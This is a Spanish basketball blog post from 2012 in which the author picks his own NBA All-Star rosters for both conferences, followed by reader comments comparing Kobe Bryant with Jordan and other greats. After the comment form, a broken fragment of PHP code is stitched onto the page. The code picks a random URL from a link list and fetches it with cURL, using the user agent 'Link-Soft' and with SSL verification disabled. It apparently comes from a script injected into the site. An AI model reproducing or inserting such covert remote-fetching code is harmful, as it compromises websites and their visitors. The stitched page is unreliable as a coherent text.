Los All Stars de TJNBA

07 de February de 2012 por txusma

A día de hoy ya conocemos cuales serán los 2 quintetos que se enfrentarán en Orlando el próximo 26 de Febrero. En el Oeste saldrán de inicio Chris Paul, Kobe Bryant, Kevin Durant, Blake Griffin y Andrew Bynum mientras que el Este lo hará con Derrick Rose, Dwyane Wade, Carmelo Anthony, LeBron James y Dwight Howard. Durante estos días arrecian los rumores y las opciones sobre los suplentes que les deberían acompañar. Como TJNBA.COM no podía ser una excepción, permitidme que pase de votaciones populares, recuentos y elecciones de entrenadores y os presente a qué 24 jugadores escogería yo.

OESTE

Quinteto inicial

(G) Chris Paul: Nunca un jugador tan pequeño golpeó con tanta fuerza los pilares de la liga. Fue sonar su nombre para los Lakers y cundir el pánico entre la mayoría de propietarios. Su caso ha pasado definitivamente a la historia y no es para menos. Su incorporación ha convertido a los Clippers en el mejor equipo de Los Angeles. Marchan líderes de la Pacific rozando el 65% siendo CP3 el mejor base de largo de la conferencia. Por carisma, competitividad, eficiencia… no hay rival ahora mismo que pueda discutirle la elección.

(G) Kobe Bryant: El “séptimo mejor jugador de la liga” está empeñado en ajustar algunas cuentas. A sus 33 años vuelve a liderar la tabla de anotadores, guiando en modo MVP a un equipo en plena crisis existencial. Hay quien defiende que esta campaña es incluso superior a alguna de las que le llevaron a ser el mejor jugador de la década. Vuelve el mejor Bryant y vuelven los viejos reproches. Nadie ha jugado así a esta edad y conviene recordar que lo está haciendo medio lesionado.

(F) Kevin Durant: El mejor jugador del mejor equipo de la liga. “Durantula”, a la chita callando, nos recuerda día a día porqué es el mejor 3 del Oeste con diferencia aunque su objetivo ya no es ese, sino enseñarnos con un anillo que puede ser uno de los mejores de toda la historia.

(F) Kevin Love: Personalmente no termino de entender su etiqueta de hacenúmeros ahora que empiezan a llegar los resultados. Tener a Minnesota revoloteando por plazas de postemporada me parece una pasada y con esa producción todavía más. La progresión día a día salta a la vista y no precisamente porque tuviera fácil mejorar. Si por una de esas suena la flauta y los Wolves se meten en la pomada que a nadie le extrañe que suene su nombre en otros debates. No me cabe duda de que entrará entre los reservas.

(C) Andrew Bynum: Mantiene un mano a mano con Marc Gasol por el honorífico título de ‘mejor pívot puro de la conferencia’. Este año se está manteniendo sano y promedia los mejores números de toda su carrera (17 puntos, 12 rebotes y 2 tapones por partido). Me quedan dudas de hasta donde podría llegar si recibiera más balones o si los Lakers jugarán más para él. Fácilmente le veo con 6 o 7 puntos por partido y eso ya serían palabras mayores.

Reservas

Steve Nash: Por talento, por clase, por regalarnos lecciones en una franquicia que va a la deriva y que más irá cuando él no esté, el canadiense se merece estar en el All Stars. Además sus números no desentonan para nada, 14’5 puntos y 9’9 asistencias por partido, el máximo de la liga.

Kyle Lowry: Houston está en puestos de playoffs y mucha parte de la culpa la tiene su pequeño base. El ex de los Grizzlies ha explotado esta temporada y promedia unos números espectaculares: 14’6 puntos, 6’1 rebotes, 8’1 asistencias y 2 robos.

Russell Westbrook: Tengo la sensación de que la temporada del base de los Thunder no es buena pero revisando sus números no hay razón objetiva para dejarle fuera. 21’7 puntos, 4’7 rebotes y 5’7 asistencias siendo el segundo espada del mejor equipo de la liga.

Blake Griffin: Ha sido escogido como titular en lo que no es, evidentemente, una decisión injusta. Su impacto en la liga va más allá de los números. Su nombre es sinónimo de espectáculo y aunque solo lleve 2 años en la liga ya nos ha regalado jugadas que pasarán a la posteridad sin ninguna duda.

Lamarcus Aldridge: El de los Blazers se está saliendo por todos los lados esta temporada. La retirada de Brandon Roy le ha dejado al mano del barco y ha respondido a la perfección. Comanda un equipo muy incómodo, principalmente en casa, que lucha por clasificarse para los Playoffs a pesar de todos los reveses sufridos estos últimos años.

Paul Millsap: Si hiciéramos una lista de jugadores infravalorados (¿alguien quiere recoger el guante?) el de los Jazz debería estar en el TOP-3. Sin hacer mucho ruido promedia 19’4 puntos, 10’9 rebotes y 1’8 robos por partido. Su falta de espectacularidad le lastra para participar en este tipo de partidos pero se lo merece por él y por la buena campaña de los Jazz.

Marc Gasol: Decidir entre los hermanos Gasol es como si me preguntaran a quien quiero más, a papá o a mamá. Me decanto por el de los Grizzlies porque consideraría un poco injuto que el séptimo equipo de la conferencia oeste aportara 3 jugadores al evento. Marc sostiene día sí y día también un juego interior tan mermado como el de Memphis y cualquier ilusión de clasificarse para Playoffs pasa por sus manos. Mientras, los americanos pueden creer que el jugador franquicia es Rudy Gay.

Se quedan fuera

Dirk Nowitzki: No creo que no vaya a Orlando pero objetivamente su temporada dista mucho de ser buena. Si exceptuamos su temporada rookie está marcando registros mínimos en prácticamente todas las categorías.

Danilo Gallinari: Parecía justo que un representante de Denver acudiera al All Stars y el italiano es el mejor jugador de los Nuggets, aunque muchos de los usuarios del blog no lo vean tan claro. Desgraciadamente, la lesión que ha sufrido esta noche le aleja definitivamente.

James Harden: ¿Quién está siendo más decisivo?¿Westbrook o Harden? He dudado hasta el último momento en incluir a Harden en lugar de Lowry pero, en igualdad de condiciones, 3 jugadores de los Thunder me han parecido excesivos a pesar de ser el mejor equipo de la liga. Mejor que quede repartidito.

Ricky Rubio: Si los americanos quieren espectáculo deberían llevar al español pero ver a dos jugadores de los Wolves sería cuanto menos extraño. No pasa nada, tengo la convicción de que Ricky disputará varios All Stars durante su carrera.

Pau Gasol: Ya lo hemos comentado. 3 jugadores de los Lakers serían demasiados y él está siendo el más flojo de los 3 grandes del equipo. Eso sí, miras sus números y tampoco están nada mal.

ESTE

Quinteto Inicial

(G) Derrick Rose: El MVP de la campaña pasada sujeta a su equipo en la cabeza de la conferencia. Nadie pone en duda a estas alturas que los Bulls son contendientes y buena culpa de eso la tiene el férreo carácter de su líder. La sensación es que si hay alguien que puede parar a los Beach Boys en el Este, ese es Rose y su equipo.

(G) Dwyane Wade: No está siendo su mejor año. Los problemas físicos le están haciendo notar la irregularidad en esta montaña rusa de temporada. Sin embargo, no hay mucha competencia en la posición de escolta. Detrás de él vendría Joe Johnson y ya conocemos lo populares que resultan los Hawks para este tipo de eventos.

(F) LeBron James: Más allá de animadversiones que despierta LeBron es el referente de la liga en muchos sentidos. Es difícil de digerir que le resulte hasta difícil mantener el 5º puesto en las votaciones populares. Se trata de un jugador imprescindible en el evento. Por juego, prestaciones y resultados es el mejor de todos ahora mismo.

(F) Chris Bosh: Prendo la mecha. La intermitencia de Wade ha obligado a Bosh a dar un paso al frente. El hecho de que Stat le sacara 80.000 votos en el último recuento me produce vergüenza ajena. Si el mundo fuera justo podrían discutirle la elección tanto Josh Smith, como Boozer, como Bargnani, pero él está por encima de todos ellos en producción y regularidad. La configuración global de aleros les termina perjudicando a todos.

(C) Dwight Howard: Aún con todo lo que le está cayendo encima (y lo que le queda) me parece imprescindible simplemente valorando su contribución defensiva. Necesita un cambio de aires. En Orlando siempre me ha parecido infrautilizado. Sería verdaderamente irónico que Howard terminara acudiendo al all-star de Orlando en propiedad de otra franquicia (¿incluso del Oeste?)

Reservas

Rajon Rondo: Ha estado varios partidos lesionado pero no hay muchos bases que puedan toserle en toda la liga y menos aún en su conferencia.

Deron Williams: La única luz en un equipo desolador como son los Nets. Obligado a anotar, sus porcentajes se resienten y su promedio de asistencias también. En un mejor equipo luciría mucho más y no se pondría en duda su asistencia al All Stars. De todas maneras está en 20 puntos y casi 9 asistencias por partido.

Andre Iguodala: El éxito de los Sixers merece la presencia de uno de sus jugadores en el All Stars e Iguodala es el máximo candidato. Dicen que no puede ser jugador franquicia pero pocos jugadores hay tan completos como él. 12’8 puntos, 6’6 rebotes, 5’2 asistencias y 1’8 robos por partido.

Carmelo Anthony: Nos podemos cegar con el mal papel de los Knicks esta temporada, sobretodo respecto a las expectativas generadas, pero no podemos negar que Carmelo lo está intentando con todas sus fuerzas. Además no creo que hayan muchos que discutan que es un TOP-10, o incluso TOP-5, en cuanto a talento se refiere.

Paul Pierce: No pasan los años para el gran capitán de los Celtics. 34 años y ahí está con 18’6 puntos, 5’5 rebotes y 5’5 asistencias por partido. Los verdes necesitan de su aportación más que nunca y él está respondiendo.

Josh Smith: El alero de los Hawks está a su nivel habitual y es le da muchas oportunidades de acudir al All Stars. Sus hojas de estadísticas siempre son completísimas lo que supone una gozada para todos los GM que lo tienen en ligas fantásticas.

Greg Monroe: Su equipo es de los peores de la liga pero él está a gran nivel. Seguramente no irá al All Stars pero sus 16’3 puntos, 10 rebotes y 1’5 robos por partido se lo valen.

Se quedan fuera

Brandon Jennings: Los Bucks están en Playoffs y Jennings está jugando su mejor baloncesto. 20 puntos por partido (por fin con buenos porcentajes), 5’4 asistencias y 1’7 robos. Si no va este año irá alguno de los siguientes. Seguro.

Joe Johnson: La lesión de Al Horford (que estaría sin duda en el All Star) ha dejado tocados a los Hawks pero Joe Johnson no ha dado un paso al frente. De hecho, su nivel está un poco por debajo del de la temporada pasada.

Tyson Chandler: Para mi está siendo uno de los mejores pívot de la conferencia detrás de Dwight Howard junto a Monroe o Hibbert. Siempre cumple con su cometido y los Knicks le deben buena parte de las victorias que atesoran. La elección de Carmelo Anthony le quita prácticamente todas las opciones de ir al All Stars. Dos jugadores de los Knicks serían demasiados.

Andrea Bargnani: El italiano estaba lanzado al principio de temporada y con él, los Raptors. Desgraciadamente la lesión ha hundido a su equipo y a él le ha dejado sin tiempo. El año que viene.

Roy Hibbert: Los Pacers se merecen un representante en el All Star pero su filosofía de equipo no permite muchas florituras individuales. Hibbert mejora año tras año y mantiene buenos promedios a pesar de que solo juega 30 minutos por partido.

Kyrie Irving: Los Cavs están luchando por entrar en Playoffs y toda la culpa la tiene el rookie. No nos dejemos llevar por la ‘marea Rubio’: Irving va a ser muy grande y ya este año podría tener opciones de ir al All Stars.

Carlos Boozer: El mejor equipo de la conferencia se merecería tener a 2 jugadores en el All Stars pero creo que pocos podemos con Carlos Boozer. Cada año va a peor.

Comenta

20 comentarios a esta entrada

  1. simon dice:
    #1

    En el OESTE :
    De acuerdo con todo menos con la inclusion de Westbrook, personalmente incluiría al Gallo, no se su lesión para cuanto tiempo es pero mientras estuviera sano lo metería, si Gallo no estuviera sano, entonces iría Parker, que me parece de los mejores bases y está marcandose autenticos partidazos
    En el Este:
    Para mi Hibbert poor encima de Monroe y no se si metería a Deron o a otro… al no haber ningun otro G de élite si que lo metería pq el único que veo a ese nivel es Irving pero puestos a elegir me quedo con Deron, Irving ya irá en el futuro. Otra cosa que no entiendo es como Josh Smith no está en la mayoria de quinielas de los especialistas para ser all-star, creo que está incluso mas infravalorado que Millsap.

    Sobre la lista de jugadores infravalorados para mi el top 4 está clarisimo: ( el orden ya el que cada uno quiera )
    Smith-Millsap-Al Jefferson- Parker ( sobretodo en ámerica )
    Me ofrezco voluntario para hacer una lista mas larga y detallada si quereis, los jugadores infravalorados me encantan.

      Citar

  2. Txusma dice:
    #2

    simon:

    Sobre la lista de jugadores infravalorados para mi el top 4está clarisimo: ( el orden ya el que cada uno quiera )
    Smith-Millsap-Al Jefferson-Parker ( sobretodo en ámerica )
    Me ofrezco voluntario para hacer una lista mas larga y detallada si quereis, los jugadores infravalorados me encantan.

    Para el lunes la quiero encima de mi mesa! 😀

    Creo que sería muy interesante. Si te puedes hacer cargo la publicaremos en cuanto la recibamos.

      Citar

  3. HisRoyalAirness dice:
    #3

    Creo que Josh Smith merece con creces ir a un All-Star.

      Citar

  4. simon dice:
    #4

    Txusma: Para el lunes la quiero encima de mi mesa!

    Creo que sería muy interesante. Si te puedes hacer cargo la publicaremos en cuanto la recibamos.

    Eso está hecho! Mañana mismo que acabo los examenes me pongo a trabajar en ello!

      Citar

  5. Lanegan dice:
    #5

    Muy interesante, como siempre. Pero eso de que nadie a jugado como Kobe a esa edad, ejem. Veamos:

    GS MPG FG% 3p% FT% OFF DEF RPG APG SPG BPG TO PF PPG
    MJ 82 37.9 0.486 0.374 0.833 1.40 4.50 5.90 4.3 1.71 0.54 2.02 1.90 29.6
    KB 25 38.3 0.444 0.299 0.845 1.30 4.50 5.80 5.4 1.20 0.40 3.80 2.10 29.3

      Citar

  6. simon dice:
    #6

    uff números casi identicos!

      Citar

  7. Sancho88 dice:
    #7

    Hostia, que grande la estadística. Brutal.

    No obstante, es mejor decirlo bajito, que aquí es tabú comparar a Jordan con Kobe. A algunos les entra urticaria y todo, xd

    Bueno, no veo en ninguna quiniela para el oeste a David Lee. Está jugando mejor que Pau, Nowitzki, Gallinari… Incluso el propio Gortat lo está haciendo mejor que ellos. Sería una frivolidad llevar a Duncan, Pau o Nowitzki (aunque supongo que alguno de estos tres caerá), y se demostraría que muchas veces no se premia al jugador que mejor está en las estadísticas, sino al jugador más mediátioco. Nos quejábamos cuando esto le pasaba a Pau, que a pesar de sus estadísticas no iba jamás al All-Star. Pues bien, yo creo que sería el momento de dos jugadores como Lee o Gortat, que a las chita callando, están bastante bien posicionados en el ranking de eficiencia. En la conferencia este debería ir Varejao como pívot suplente de Howard por delante de Hibbert y Boozer. Es un tío que por fin ha alcanzado todo aquello que se presumía en su época en el Barsa. Es un jugadorazo, y si uno lo mira detenidamente, da miedito el juego interior de Brasil para Londres: Nené, Varejao, Splitter, Hettsheimeir… como decimos por Castilla, se caga la perra!! y luego en la dirección Marcelinho con Raulzinho Neto, Barbosa y Machado para colarlas, Álex García…. y me estoy dejando gente seguro.

    Pues eso, seguramente Gortat, Lee o Varejao sean algunos spoilers de esa lista de Simón. XD

      Citar

  8. Jose Luis dice:
    #8

    Bueno Lanegan, son números muy parecidos (en casi todos pierde Kobe por un poquito), pero date cuenta de con quién lo estás comparando. Es lo que dijo el mismo Jordan, que si alguien aguanta una comparación con él, ese es Kobe Bryant,

      Citar

  9. Lanegan dice:
    #9

    Jose Luis:
    Bueno Lanegan, son números muy parecidos (en casi todos pierde Kobe por un poquito), pero date cuenta de con quién lo estás comparando. Es lo que dijo el mismo Jordan, que si alguien aguanta una comparación con él, ese es Kobe Bryant,

    Si, no era por abrir ninguna polémica, solo por poner en relieve que Jordan a la edad de Kobe iba a por su penúltimo título, y dominando con mano de hierro una liga de un nivel espectacular (no soy un ani-Kobe, ni mucho menos). Saludos.

      Citar

  10. r_miller dice:
    #10

    te as dejado a Stoudomier!! aunque creo que en algun momento dices que tiene que ir

      Citar

  11. Esteban dice:
    #11

    kobe no se compara a jordan, pero a sewr sincero, es lo mas parecido que ha salido, mas que cualquier otro pretendiente a sucesor (aun tiene tiempo lebron, y wade la ha cagado) lo que no es poco, lo hace el mejor escolta de una decada entera en la nba, ah destruido records, y ganado anillos y mvp, lo que deberia alcanzar para estar contento, quiza hasta podria meterse entre los 20 mejores de lña historia, que mas puede pedir?

    si pide mas, que gane 4 anillos mas con 4 mvp de finales, y ahi si podra estar en la discusion con jordan

      Citar

  12. melo15 dice:
    #12

    perdona, pero soy joven y no he visto ni a Magic, ni a Bird ni a Havlicek ni nadie de estos, por lo tanto no entiendo que no ha hecho Kobe para estar entre ellos, que ha hecho Bird mejor??? Para mi Top-15 o 10

      Citar

  13. Esteban dice:
    #13

    melo15:
    perdona, pero soy joven y no he visto ni a Magic, ni a Bird ni a Havlicek ni nadie de estos, por lo tanto no entiendo que no ha hecho Kobe para estar entre ellos, que ha hecho Bird mejor??? Para mi Top-15 o 10

    sucede que si bien KOBE tiene 5 anillos, solo tiene 2 MVP de las finales, incluso shaq tiene 3, mientras que jordan 6 ja! flor de diferencia, creo que si bien el aporte de kobe en los 3 primeros titulos fue enorme, si los MVP fueron a shaq, su merito no es tan grande

      Citar

  14. Vader dice:
    #14

    En mi opinion tanto Bird, Magic y desde luego Jordan son mejores que Kobe…

      Citar

  15. Sancho88 dice:
    #15

    Pero sumidos en la mediocridad y en la deriva hacia el imperio del físico puro en la liga, Bryant es lo más parecido a lo que fueron Bird, Magic y Jordan. La comparación, como siempre digo, debe hacerse por circunstancias históricas, sobre dominio real de la liga, si está a la altura o no de lo que hicieron sus antepasados. Y en mi opinión, Bryant ha dominado claramente una década, como hicieron estos tres jugadores. Por tanto, la comparación le deja en pie muy dignamente. Ahora bien, en la pelea por el romanticismo, siempre va a ser imposible demostrar esto con los niños que os criasteis en los 80, que estáis muy cerraos en estos tíos y muchas veces no queréis ver que lo nuevo también puede ser igual de bueno o mejor que lo anterior. Los que siempre defendeis a capa y espada a Bird, Jordan, Magic, etc. me recordáis a ese viejo tomando chatos viendo un partido del Madrid, y que de repente te suelta… ese Cristiano…. en comparación con Di Stefano y Puskas… y así siempre la misma historia. Bird físicamente no aguantaría el ‘tute’ contra Lebron James, Blake Griffin, Kevin Durant, ni de coña amigos. Técnicamente no digo nada, porque está claramente demostrado que ha sido casi la mayor delicia en este apartado. Antes primaba más el talento, ahora lo hace el físico, son épocas distintas. Pero cerrar el debate a las comparaciones, a no debatir, etc. me parece de ancianos tomándose el chatillo de vino en el bar, sinceramente

      Citar

  16. Sancho88 dice:
    #16

    Esta noche Ricky Vs. Kings. GO KINGS!!

      Citar

  17. Sancho88 dice:
    #17

    Tenemos la tercera mejor racha de victorias seguidas de la liga, igualados con los Bulls en 3, y detrás de las 4 consecutivas de Celtics, y 5 de Spurs. Ojito, porque esto ocurre tras la recuperación de Thornton. Las amenzas de los Kings son bastante grandes con su quinteto, y en la segunda unidad hay un tipo como Hickson que debe dar un paso adelante para entrar en la segunda parte de la temporada con mucho más protagonismo. A mi juicio, hoy decidirá la segunda unidad, en dos equipos muy jóvenes. Kings pueden acribillar a Wolves desde el triple, no obstante, Adelman, como perro viejo, seugro que va a poner soluciones. Pero yo veo favoritos a Kings, sinceramente

      Citar

  18. HeiNeKeN dice:
    #18

    Los Wolves juegan sin Love… ahi esta medio partido

      Citar

  19. Pop dice:
    #19

    Pekovic All-Star!

      Citar

  20. RSB dice:
    #20

    De acuerdo con los suplentes que habeis escogido, sobre todo en los del oeste. Sí señor

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>